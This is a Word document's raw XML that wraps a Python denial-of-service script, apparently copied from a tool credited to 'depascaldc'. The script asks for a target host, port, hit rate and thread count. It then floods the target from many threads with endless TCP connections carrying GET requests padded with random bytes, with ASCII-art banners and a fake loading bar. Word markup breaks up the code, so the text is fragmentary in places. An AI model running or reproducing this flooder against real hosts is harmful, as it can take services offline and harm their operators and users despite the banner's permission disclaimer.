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F74D" w14:textId="77777777" w:rsidR="00C2787D" w:rsidRPr="00C2787D" w:rsidRDefault="00C2787D" w:rsidP="00C2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</w:pPr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"""</w:t>
      </w:r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>/*</w:t>
      </w:r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 xml:space="preserve"> * This DOS-TOOL was written by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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depascaldc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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( Discord: depascaldc#1234 ) &lt; service@depascaldc.de &gt;</w:t>
      </w:r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 xml:space="preserve"> * Copying for PRIVATE usage is allowed as long as you don't mention it as your own.</w:t>
      </w:r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 xml:space="preserve"> * Copyright (C) 2020 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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depascaldc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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| All Rights Reserved</w:t>
      </w:r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 xml:space="preserve"> *</w:t>
      </w:r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 xml:space="preserve"> */</w:t>
      </w:r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>"""</w:t>
      </w:r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import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socket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import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time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os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import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random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from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threading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import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Thread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os.system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"clear"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if not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__name__ ==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"__main__"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exit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ConsoleColors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HEADER =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\033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[95m'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OKBLUE =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\033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[94m'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OKGREEN =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\033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[92m'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WARNING =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\033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[93m'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FAIL =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\033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[91m'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BOLD =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\033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[1m'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ConsoleColors.WARNING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'''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____       ____      _____           _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>|  _ \  ___/ ___|    |_   _|__   ___ | |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>| | | |/ _ \___ \ _____| |/ _ \ / _ \| |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>| |_| | (_) |__) |_____| | (_) | (_) | |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>|____/ \___/____/      |_|\___/ \___/|_|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     written by: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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depascaldc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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     for private USAGE ONLY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     Make sure you have the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    permission to attack the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           given host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  '''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2787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getport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():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try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input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ConsoleColors.OKGREEN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"Port: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return </w:t>
      </w:r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</w:t>
      </w:r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ValueError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ConsoleColors.WARNING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"ERROR Port must be a number, Set Port to default "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ConsoleColors.OKGREEN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"80"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return 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80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lastRenderedPageBreak/>
        <w:t xml:space="preserve">host =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input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ConsoleColors.OKBLUE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"Host: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port =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getport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speedPerRun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=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input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ConsoleColors.HEADER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"Hits Per Run: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threads =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input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ConsoleColors.WARNING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"Thread Count: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socket.gethostbyname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(host)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bytesToSend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= random._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urandom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2450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= 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0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class </w:t>
      </w:r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packetCounter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= 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0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2787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goForDosThatThing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():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try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while True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dosSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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socket.socket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socket.AF_INET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socket.SOCK_STREAM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try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dosSocket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.connect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 port))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range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speedPerRun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try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dosSocket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.send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str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.encode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"GET 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bytesToSend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str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.encode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" HTTP/1.1 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dosSocket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.sendto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str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.encode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"GET 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bytesToSend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str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.encode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" HTTP/1.1 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 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 port))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ConsoleColors.OKGREEN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"-----&lt; PACKET "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ConsoleColors.FAIL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str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Count.packetCounter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ConsoleColors.OKGREEN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" SUCCESSFUL SENT AT: " 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ConsoleColors.FAIL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time.strftime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"%d-%m-%Y %H:%M:%S"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time.gmtime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())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ConsoleColors.OKGREEN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 &gt;-----"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Count.packetCounter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Count.packetCounter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socket.error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ConsoleColors.WARNING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"ERROR, Maybe the host is down?!?!"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KeyboardInterrupt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ConsoleColors.FAIL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[-] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Canceled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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by user"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socket.error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ConsoleColors.WARNING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"ERROR, Maybe the host is down?!?!"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KeyboardInterrupt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ConsoleColors.FAIL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[-] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Canceled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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by user"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C27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dosSocket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.close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KeyboardInterrupt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ConsoleColors.FAIL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[-] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Canceled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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by user"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try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ConsoleColors.OKBLUE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'''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_   _   _             _      ____  _             _   _            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/ \ | |_| |_ __ _  ___| | __ / ___|| |_ __ _ _ __| |_(_)_ __   __ _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/ _ \| __| __/ _` |/ __| |/ / \___ \| __/ _` | '__| __| | '_ \ / _` |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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> / ___ \ |_| || (_| | (__|   &lt;   ___) | || (_| | |  | |_| | | | | (_| |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>/_/   \_\__|\__\__,_|\___|_|\_\ |____/ \__\__,_|_|   \__|_|_| |_|\__, |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                     |___/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br/>
        <w:t xml:space="preserve">          '''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ConsoleColors.OKGREEN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"LOADING &gt;&gt; [                    ] 0% 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time.sleep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ConsoleColors.OKGREEN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"LOADING &gt;&gt; [=====               ] 25%"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time.sleep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ConsoleColors.WARNING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"LOADING &gt;&gt; [==========          ] 50%"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time.sleep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ConsoleColors.WARNING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"LOADING &gt;&gt; [===============     ] 75%"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time.sleep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278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ConsoleColors.FAIL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"LOADING &gt;&gt; [====================] 100%"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range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(threads):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try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t = Thread(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2787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GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>target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goForDosThatThing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t.start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KeyboardInterrupt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ConsoleColors.FAIL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[-] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Canceled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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by user"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278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KeyboardInterrupt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278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print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ConsoleColors.BOLD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ConsoleColors.FAIL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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+ 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"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C278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GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r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[-] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Canceled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C278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by user"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C278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</w:p>
    <w:p w14:paraId="75D4E4B7" w14:textId="77777777" w:rsidR="00140F33" w:rsidRDefault="00140F33"/>
    <w:sectPr w:rsidR="0014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A3"/>
    <w:rsid w:val="00096868"/>
    <w:rsid w:val="00140F33"/>
    <w:rsid w:val="005743A3"/>
    <w:rsid w:val="00C2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04B57-845C-4DCC-94E8-B3CA8116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3A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 Russell</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Joshua O Russell</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-14T16:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-14T16:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>